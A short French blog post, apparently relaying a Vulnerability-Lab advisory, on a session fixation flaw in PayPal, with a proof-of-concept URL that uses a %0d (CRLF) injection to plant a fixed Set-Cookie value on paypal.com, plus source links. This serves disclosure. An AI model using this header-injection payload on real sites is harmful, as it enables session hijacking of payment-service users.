Paypal Session fixation

Une vulnérabilité de type Session Fixation a été découverte dans le système de paiement Paypal. La faille peut être exploitée par des attaquants ayant un accès physique restreint et sans nécessité d’interaction.

Chaîne de caractère utilisée: %0d

Preuve de concept:
https://www.paypal.com/fr/cgi-bin///aao.com//%0dSet-Cookie:HaC80bwXscjqZ7KM6VOxULOB534=6RhGQapRfYgjamJv09KeTBVtJKw9oNcq8mnJDC_2H0t3denjeUdz8DnNpFn7iFUNVfPsPRu99_xUmvNcx_OaToy5En6pvysvcdCKmtdPawmYtupbEAVo4txChxNXlGdPmsWHB0; Domain=.paypal.com; Path=/;Expires=Mon, 08 Jun 2020 18:53:07 GMT; HttpOnly; Secure

Liens

http://www.vulnerability-lab.com/get_content.php?id=1509
https://packetstormsecurity.com/files/133974/VL-1509.txt

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Time limit is exhausted. Please reload CAPTCHA.